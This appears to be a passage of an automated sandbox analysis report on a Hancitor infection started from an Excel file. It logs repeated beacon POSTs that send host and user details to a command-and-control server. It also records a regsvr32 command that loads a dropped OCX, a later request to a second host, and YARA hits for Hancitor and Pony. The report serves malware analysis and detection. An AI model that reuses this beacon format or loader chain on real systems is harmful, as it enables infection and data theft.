                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      8192.168.1.1024971991.218.231.22680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:22:22.764802933 CEST922OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:22.866281986 CEST922INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 4e 4d 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKNMPARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:23.183684111 CEST923OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:23.288708925 CEST923INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZNMAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:23.594024897 CEST923OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:23.701631069 CEST924INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVTGEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:24.007934093 CEST924OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:24.110548973 CEST925INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 51 4a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKQJPARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:24.408555984 CEST925OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:24.502304077 CEST925INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVBYEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:24.818351030 CEST926OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:24.910289049 CEST926INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNHSMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:25.244096041 CEST927OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:25.340518951 CEST927INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZKPAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:25.688595057 CEST927OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:25.783973932 CEST928INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVZAEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:26.096357107 CEST928OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:26.191376925 CEST928INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBKPYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:26.510360956 CEST929OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:26.605473042 CEST929INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 42 59 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTBYGARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:26.888808012 CEST929OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:26.980513096 CEST930INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVBYEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:27.289052010 CEST930OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:27.383918047 CEST930INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 43 58 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJCXQARRABw==0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      9192.168.1.102497218.208.80.22680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:22:28.692337990 CEST932OUTGET /webstore/AOTtVIIFCyCl/rwHdKEZcyQz/zhsxqwtz0yJYCb/7wUwfdl67qUD5HOfnxeCy/4K2RFYcLg8x3JVwy/HHqS5FYbT5LR812/3drnDFI56W2PMZ4T3B/Z2k1S5bLG/ggEuoPBYFVY9Ucp4X2wJ/fxiLjJeTe5E6Iv80mkC/IkwsZL_2F_2BeRu3yeL0kw/Iz7Rtfj8FmL6o/19PNHBMl/ZMvH4neYIcicG6MljnDN_2B/AEobh9WXfv/6OZ5eYjqbttNmOt00/h6KBLnTcHE_0/A_0DXlYD3rU/jMSlmxbL3fthS_/2BwqQVILC1SW2R8JiDYGM/FJdHfBp4_2FZn6db/50iMd53h_2BkoMJ/H HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: low.explik.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Jul 14, 2020 11:22:28.938731909 CEST932INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:28 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410


                                                                                                                                      HTTPS Packets

                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                      Jul 14, 2020 11:20:35.155435085 CEST185.206.163.136443192.168.1.10249707CN=accesoeducativo.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Apr 29 20:38:16 CEST 2020 Thu Mar 17 17:40:46 CET 2016Tue Jul 28 20:38:16 CEST 2020 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                      CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      Analysis Process: EXCEL.EXE PID: 5920 Parent PID: 732

                                                                                                                                      General

                                                                                                                                      Start time:11:20:10
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                      Imagebase:0x350000
                                                                                                                                      File size:43854104 bytes
                                                                                                                                      MD5 hash:D672D26C85AEB9536B9736BF04054969
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: regsvr32.exe PID: 4912 Parent PID: 5920

                                                                                                                                      General

                                                                                                                                      Start time:11:20:25
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx
                                                                                                                                      Imagebase:0x1250000
                                                                                                                                      File size:20992 bytes
                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Hancitor, Description: Hancitor Payload, Source: 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: svchost.exe PID: 5128 Parent PID: 4912

                                                                                                                                      General

                                                                                                                                      Start time:11:20:33
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe
                                                                                                                                      Imagebase:0x30000
                                                                                                                                      File size:44520 bytes
                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Hancitor, Description: Hancitor Payload, Source: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: pony, Description: Identify Pony, Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.460854186.0000000005C00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: pony, Description: Identify Pony, Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.461350530.0000000005100000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: pony, Description: Identify Pony, Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.461304914.0000000005A01000.00000004.00000001.sdmp, Author: Joe Security
